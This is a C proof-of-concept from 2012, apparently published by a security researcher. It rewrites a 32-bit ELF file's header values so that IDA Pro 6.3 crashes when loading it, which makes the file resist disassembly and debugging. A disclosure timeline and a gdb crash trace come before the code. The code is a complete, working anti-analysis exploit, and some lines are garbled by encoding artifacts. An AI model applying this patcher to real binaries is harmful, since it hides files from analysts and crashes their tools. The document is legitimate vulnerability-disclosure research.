1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216 | /*
*
* IDA Pro 6.3 (crash due an internal error)
* ELF anti-debugging/reversing patcher
*
* Published @ IOActive Labs Research blog:
* http://blog.ioactive.com/2012/12/striking-back-gdb-and-ida-debuggers.html
*
* - nitr0us [ http://twitter.com/nitr0usmx ]
*
* Tested under:
* IDA Pro Starter License 6.3.120531 (Mac OS X)
* IDA Pro Demo 6.3.120730 (Ubuntu Linux 9.04)
* IDA Pro Demo 6.3.120730 (Mac OS X 10.7.3)
* IDA Pro Demo 6.3.120730 (Windows Vista Home Premium SP2)
*
* Bug found using Frixyon fuzzer (my ELF file format fuzzer still in develo=
pment)
*
* Timeline:
* 21/11/2012 The bug was found on IDA Demo 6.3
* 22/11/2012 The bug was tested on IDA Pro Starter License 6.3.120531 (3=
2-bit)
* 22/11/2012 The bug was reported through the official Hex-Rays contact =
emails
* 23/11/2012 Hex-Rays replied and agreed that the bug leads to an unreco=
verable
* state and it will be fixed on the next release
*
**************** TECHNICAL DETAILS ***********************
nitr0us@burial:~$ gdb -q idaq
(gdb) r a.out
(no debugging symbols found)
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 0xb6860760 (LWP 3638)]
0xb55f7694 in default_notification_handler (reader=@0xbfbffae0,
notif=reader_t::err_shstrndx) at reader.cpp:33
33 reader.cpp: No such file or directory.
in reader.cpp
Current language: auto; currently c++
(gdb)
The root cause of the problem is that there's no validation to
verify if e_shstrndx > e_shnum before referencing it.
**********************************************************
*
* [Compilation] $ gcc ida_63_elf_shield.c -o ida_63_elf_shield -Wall
*
* Sh0utz: IOActive fellows, CRAc, b33rc0n crew (dex, hkm, calderpwn,
* Carlos Ayala, Daemon [Thanks for test it on IDA paid $$$],=20
* LightOS) chr1x, alt3kx, tr3w, crypkey, el_chito, nahual, beck,=20
* sirdarkcat, NataS, ran, Fede Bossi, nediam, psymera, Rolman,=20
* Kbrown, Bucio, p4dm3, Hector Lopez, zeus, Matias Brutti,
* sunl3vy, Raaka_elgaupo, vendetta, raito, beavis, el5patas,=20
* vi0let.
*
*
* http://chatsubo-labs.blogspot.com
* http://www.brainoverflow.org
*
*/
#include <sys/mman.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <time.h>
#define EI_NIDENT 16
#define ELFCLASS32 1 /* 32-bit objects */
#define ELFDATA2LSB 1 /* 2's complement, little endian */
const char e_magic[4] = { 0x7f, 'E', 'L', 'F' };
typedef uint16_t Elf32_Half;
typedef uint32_t Elf32_Word;
typedef uint32_t Elf32_Addr;
typedef uint32_t Elf32_Off;
typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf32_Half e_type; /* Object file type */
Elf32_Half e_machine; /* Architecture */
Elf32_Word e_version; /* Object file version */
Elf32_Addr e_entry; /* Entry point virtual address */
Elf32_Off e_phoff; /* Program header table file offset=
*/
Elf32_Off e_shoff; /* Section header table file offset=
*/
Elf32_Word e_flags; /* Processor-specific flags */
Elf32_Half e_ehsize; /* ELF header size in bytes */
Elf32_Half e_phentsize; /* Program header table entry size =
*/
Elf32_Half e_phnum; /* Program header table entry count=
*/
Elf32_Half e_shentsize; /* Section header table entry size =
*/
Elf32_Half e_shnum; /* Section header table entry count=
*/
Elf32_Half e_shstrndx; /* Section header string table inde=
x */
} Elf32_Ehdr;
int isELF(int fd);
int main(int argc, char **argv)
{
Elf32_Ehdr*header;
Elf32_Halfnew_shnum;
Elf32_Halfnew_shstrndx;
intfd;
printf("######################################################\n");
printf("# #\n");
printf("# IDA Pro 6.3 - ELF anti-debugging/reversing patcher #\n");
printf("# -nitr0us- #\n");
printf("# #\n");
printf("######################################################\n\n");
if(argc < 2){
fprintf(stderr, "Usage: %s <elf_file_to_patch>\n", argv[0]);
exit(-1);
}
if((fd = open(argv[1], O_RDWR)) == -1){
perror("open");
exit(-1);
}
if(!isELF(fd)){
close(fd);
exit(-1);
}
// Mapping to memory only the necessary bytes [sizeof(header)]
if((header = (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO=
T_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
}
printf("[*] The ELF file originally has:\n");
printf("[-] Ehdr->e_shnum: %5d (0x%.4x)\n", header->e_shnum, header->=
e_shnum);
printf("[-] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", header->e_shstrndx, hea=
der->e_shstrndx);
printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]);
srand(time(NULL)); // seed for rand()
new_shnum = (Elf32_Half) rand() % 0x1337;
new_shstrndx = (Elf32_Half) 0;
while(new_shstrndx < new_shnum)
new_shstrndx = (Elf32_Half) rand() % 0xDEAD;
header->e_shnum = new_shnum;
header->e_shstrndx = new_shstrndx;
// Synchronize the ELF in file system with the previous memory mapped
if(msync(NULL, 0, MS_SYNC) == -1){
perror("msync");
close(fd);
exit(-1);
}
close(fd);
munmap(header, 0);
printf("[*] The patched ELF file now has:\n");
printf("[+] Ehdr->e_shnum: %5d (0x%.4x)\n", new_shnum, new_shnum);
printf("[+] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", new_shstrndx, new_shstr=
ndx);
printf("[*] IDA Pro 6.3 should crash trying to load \"%s\"\n", argv[1]);
return 0;
}
int isELF(int fd)
{
Elf32_Ehdrheader;
if(read(fd, &header, sizeof(header)) == -1){
perror("isELF(): read");
return 0;
}
/* magic number verification */
if(memcmp(header.e_ident, e_magic, 4) != 0){
fprintf(stderr, "The argument given is not an ELF file !\n");
return 0;
}
/* 32-bit class verification */
if(header.e_ident[4] != ELFCLASS32){
fprintf(stderr, "Only 32-bit ELF files supported !\n");
return 0;
}
/* little-endian verification */
if(header.e_ident[5] != ELFDATA2LSB){
fprintf(stderr, "Only little-endian ELF files supported !\n");
return 0;
}
return 1;
}
|
